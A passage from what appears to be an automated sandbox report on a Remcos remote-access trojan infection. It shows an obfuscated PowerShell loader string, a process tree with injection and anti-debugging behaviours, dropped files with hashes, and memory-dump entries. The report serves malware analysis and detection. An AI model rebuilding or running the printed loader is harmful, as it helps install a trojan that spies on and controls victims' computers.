lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2744
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2608
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:1700

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      f9cfe51fabf951c2785a76518d1bf21e

      SHA1

      80b7a676c9a0a8c6fc9b62e926268ca98ba45d81

      SHA256

      fefbf7f5be88149baa11b22abffb9aad1789c7c4047e880663888a28afb252fc

      SHA512

      3641e155083c7e237a5ec25cbfb128f12661588ca8b5db35a49cd4e0b8baea991b41f232ac4ec67982fae7a9d8abc2d79370ef3c5ef03112faa0cbfff3ed9b3f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Indlaanet.Sor
      Filesize

      435KB

      MD5

      d1d94e8b3529057db3dc0cbe4e6f616a

      SHA1

      a4dd4b336557a88d2e165cd6f7aab679095efc33

      SHA256

      c19e7f8bf24326c8eda4569400e723dace3753f4edab2577f89b70585664cb15

      SHA512

      06460dd08693c88daab40c9c9621a1c85b7e07408e34e02bd01d8989b14dcf1caf082a8c58889bc131b97929c938fce63d87f64de08e5e0be256b2d97148ce6c

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZLGT9152EGDQBGN6LPGA.temp
      Filesize

      7KB

      MD5

      f6205fa82e863d0b1b847550b486bfa8

      SHA1

      20fd616512ed89538cf82d9d64dc373208baba4e

      SHA256

      f185dde72b2eac05172548566641c2a20c519130ea4215cf51820957a79a19b4

      SHA512

      4f6f48f6166d730171068036ed6363820ef1a88613b33d42d03fd65ddced5ffcbfab52e258ca415c5a7703695243f7971ab0ac85367476947d96a0daad326bb9

      Download Submit

    • memory/1700-41-0x0000000001C40000-0x0000000004E45000-memory.dmp

      Filesize

      50.0MB

      Download

    • memory/1700-21-0x0000000000BD0000-0x0000000001C32000-memory.dmp

      Filesize

      16.4MB

      Download

    • memory/1700-19-0x0000000001C40000-0x0000000004E45000-memory.dmp

      Filesize

      50.0MB

      Download

    • memory/2372-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2372-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2372-13-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2372-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2372-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2372-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2372-5-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2372-6-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2372-42-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2372-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2744-18-0x00000000065F0000-0x00000000097F5000-memory.dmp

      Filesize

      50.0MB

      Download